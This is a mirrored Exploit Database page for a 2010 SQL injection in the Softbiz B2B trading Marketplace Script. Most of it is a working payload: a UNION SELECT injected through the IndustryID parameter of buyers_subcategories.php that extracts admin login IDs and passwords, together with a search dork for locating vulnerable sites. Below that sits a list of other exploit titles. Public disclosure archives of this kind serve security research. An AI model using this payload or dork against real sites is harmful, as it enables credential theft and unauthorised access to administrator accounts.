Softbiz B2B trading Marketplace Script – buyers_subcategories SQL Injection

Exploit Database
9 阅读

作者： AnGrY BoY

日期： 2010-04-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12245/

# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Date :15/4/2010
# Author : AnGrY BoY
# Contact: h4kurd@hotmail.com & h4kurd@yahoo.com
# Home : http://www.kurd-security.com
# Software Link : N/A
# Version : Softbiz B2B trading Marketplace Script
# Tested on : windows SP2
# CVE : 0
# Dork : buyers_subcategories.php?IndustryID=
 
 
 
# expolit:


# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]
			
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
 
=============================================
# Gre3tZ :- all kurd-security members

last Exploits
Softbiz B2B trading Marketplace Script – buyers_subcategories SQL Injection的更多信息

WSN Guest – Database Disclosure：
AirDisk Pro 5.5.3 for iOS – Persistent Cross-Site Scripting：
Oracle NoSQL 11g 1.1.100 R2 – ‘log’ Directory Traversal：
Gespage 7.4.8 – SQL Injection：
Nagios XI 5.7.3 – ‘Contact Templates’ Persistent Cross-Site Scripting：
Dokeos 2.2.1 – Blind SQL Injection：
kaibb 1.0.1 – Multiple Vulnerabilities：
Basic Analysis and Security Engine (BASE) 1.4.5 – ‘/includes/base_include.inc.php?base_path’ Remote File Inclusion：